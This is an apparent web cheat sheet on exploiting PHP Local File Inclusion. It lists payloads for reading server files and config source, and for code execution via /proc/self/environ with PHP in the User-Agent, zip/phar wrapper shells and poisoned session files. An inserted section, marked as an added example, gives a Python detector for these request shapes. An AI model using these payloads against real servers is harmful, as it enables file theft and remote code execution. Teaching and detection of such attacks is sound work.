Tricky ways to exploit PHP Local File Inclusion

Introduction

According to Wikipedia, Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability, except that instead of remote files, only local files (i.e. files on the current server) can be included for execution.

For instance:

include $_GET['file'];

or a harder one, where ".php" is appended to the parameter:

include $_GET['file'] . ".php";

Tricks

Direct Local File Inclusion

  • Reading arbitrary files:

    • index.php?file=/etc/passwd
    • index.php?file=php://filter/convert.base64-encode/resource=config.php
  • Remote code execution:

    • /proc/self/environ

      GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1
      Host: www.site.com
      User-Agent: <?php echo assert($_GET['cmd']);?>
      
    • Zip and Phar wrappers

      • index.php?file=zip://image.zip#shell.php
      • index.php?file=phar://image.phar/shell.php
    • Session Files

      • PHP5 stores session files in /var/lib/php5/sess_*
        Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
        index.php?file=/var/lib/php5/sess_123php
        

Indirect Local File Inclusion

  • Reading arbitrary files:

    • index.php?file=php://filter/convert.base64-encode/resource=config # the include appends ".php" at the end
  • Remote code execution:

    • Zip and Phar wrappers
      • index.php?file=zip://image.zip#shell
      • index.php?file=phar://image.phar/shell
    • Session Files
      • PHP5 stores session files in /var/lib/php5/sess_*
        Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
        index.php?file=/var/lib/php5/sess_123
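
Seen from the defending side, each payload shape in the two lists above leaves a recognisable value in the `file` parameter or in a request header. The following is an added example, not part of the original page: a small detector that flags those shapes in HTTP request lines. The function names, indicator labels and sample requests are constructed for illustration, and the parameter name `file` is taken from the page's own snippets.

```python
import re
from urllib.parse import parse_qs

WRAPPER = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)  # php://, zip://, phar://
SESSION = re.compile(r"(^|/)sess_[^/]*$")              # PHP session file name
PHP_TAG = re.compile(r"<\?")                           # PHP open tag in a header

def findings(request_line, user_agent="", param="file"):
    """Return the sorted LFI indicators found in one HTTP request."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    query = target.partition("?")[2]
    hits = set()
    # parse_qs percent-decodes, so %3A%2F%2F and %23 are checked in decoded form.
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        if WRAPPER.match(value):
            hits.add("stream-wrapper")
        if value.startswith("/proc/"):
            hits.add("procfs")
        if SESSION.search(value):
            hits.add("session-file")
        if value.startswith("/"):
            hits.add("absolute-path")
    # The /proc/self/environ technique depends on PHP code arriving in a header.
    if PHP_TAG.search(user_agent):
        hits.add("php-tag-in-header")
    return sorted(hits)

# Constructed sample requests (request line, User-Agent) for illustration.
SAMPLES = [
    ("GET /index.php?file=about HTTP/1.1", "Mozilla/5.0"),
    ("GET /index.php?file=/etc/passwd HTTP/1.1", "Mozilla/5.0"),
    ("GET /index.php?file=php%3A%2F%2Ffilter/convert.base64-encode/resource=config HTTP/1.1", "curl/8.0"),
    ("GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1", "<?php echo 1; ?>"),
    ("GET /index.php?file=zip://image.zip%23shell HTTP/1.1", "Mozilla/5.0"),
    ("GET /index.php?file=/var/lib/php5/sess_123php HTTP/1.1", "Mozilla/5.0"),
]

def scan(samples):
    """Return only the requests that triggered at least one indicator."""
    flagged = []
    for line, agent in samples:
        hits = findings(line, agent)
        if hits:
            flagged.append((line, hits))
    return flagged

if __name__ == "__main__":
    for line, hits in scan(SAMPLES):
        print(", ".join(hits), "<-", line)
```

A hit is a triage signal rather than proof of compromise: an application that legitimately passes absolute paths in `file` will also match `absolute-path`.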
        

Reference

  1. File inclusion vulnerability
  2. Including files via the zip/phar protocols
  3. AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)
  4. lucyoa/ctf-wiki